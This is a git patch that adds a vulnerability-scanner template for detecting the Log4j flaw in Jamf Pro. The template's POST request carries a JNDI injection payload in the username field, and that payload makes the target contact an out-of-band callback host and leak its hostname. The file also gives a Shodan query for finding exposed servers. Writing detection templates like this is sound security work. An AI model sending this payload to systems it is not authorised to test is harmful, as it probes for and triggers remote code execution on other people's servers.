From c66276c4ed5cf9242e104f3832a0ced8e316c6d0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 23 Jul 2022 18:14:26 +0530 Subject: [PATCH] Create jamf-pro-log4j.yaml --- vulnerabilities/other/jamf-pro-log4j.yaml | 50 +++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 vulnerabilities/other/jamf-pro-log4j.yaml diff --git a/vulnerabilities/other/jamf-pro-log4j.yaml b/vulnerabilities/other/jamf-pro-log4j.yaml new file mode 100644 index 0000000000..60f4f55d4a --- /dev/null +++ b/vulnerabilities/other/jamf-pro-log4j.yaml @@ -0,0 +1,50 @@ +id: jamf-pro-log4j + +info: + name: JamfPro Log4j + author: DhiyaneshDK + severity: critical + reference: + - https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html + metadata: + verified: true + shodan-query: title:"Jamf Pro" + tags: rce,jndi,log4j,jamfpro + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + username=${jndi:ldap://${hostName}.{{interactsh-url}}}&password=admin + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'